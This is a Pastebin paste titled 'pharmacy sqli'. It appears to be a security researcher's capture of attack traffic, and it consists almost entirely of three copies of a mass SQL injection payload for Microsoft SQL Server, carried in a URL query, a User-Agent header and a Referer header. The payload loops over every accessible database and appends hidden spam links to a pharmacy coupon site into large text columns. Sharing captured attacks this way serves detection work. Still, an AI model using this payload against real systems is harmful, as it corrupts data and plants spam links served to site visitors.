API tools faq
paste
Neonprimetime

pharmacy sqli

Neonprimetime
Mar 14th, 2016
156
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.16 KB | None | 0 0
raw download clone embed print report
  1. GET/file.aspx?id=1);declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''''+char(60)+''div style="display:none"''+char(62)+''rite aid photo coupon ''+char(60)+''a href="http:''+char(47)+char(47)+''www.mcmurray.biz''+char(47)+''page''+char(47)+''rite-aid-drug-store-locations"''+char(62)+''''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''rite aid card'''' when 1 then ''''read'''' else ''''mcmurray.biz'''' end +''''''+char(60)+char(47)+''a''+char(62)+'' stride rite printable coupons''+char(60)+char(47)+''div''+char(62)+'''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--
  2.  
  3. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0);declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''<div style="display:none">rite aid photo coupon <a href="http://www.mcmurray.biz/page/rite-aid-drug-store-locations">''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''rite aid card'''' when 1 then ''''read'''' else ''''mcmurray.biz'''' end +''''</a> stride rite printable coupons</div>'''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--
  4.  
  5. Referer: http://google.com);declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select db_name() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',db_name());open @b;fetch next from @b into @w;while @@fetch_status=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+table_name+''] set [''+column_name+'']=[''+column_name+'']+case abs(checksum(newid()))%10 when 0 then ''''<div style="display:none">rite aid photo coupon <a href="http:/www.mcmurray.biz/page/rite-aid-drug-store-locations">''''+case abs(checksum(newid()))3 when 0 then ''''rite aid card'''' when 1 then ''''read'''' else ''''mcmurray.biz'''' end +''''</a> stride rite printable coupons</div>'''' else '''''''' end'' from sysindexes as i inner join sysobjects as o on i.id=o.id inner join information_schema.columns on o.name=table_name where(indid in (0,1)) and data_type like ''varchar'' and(character_maximum_length in (2147483647,-1));open @c;fetch next from @c into @d;while @@fetch_status=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--
  6.  
  7.  
  8. *******
  9. *******
  10. *******
  11. More FROM @neonprimetime security
  12.  
  13. http://pastebin.com/u/Neonprimetime
  14. https://www.virustotal.com/en/USER/neonprimetime/
  15. https://twitter.com/neonprimetime
  16. https://www.reddit.com/USER/neonprimetime
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!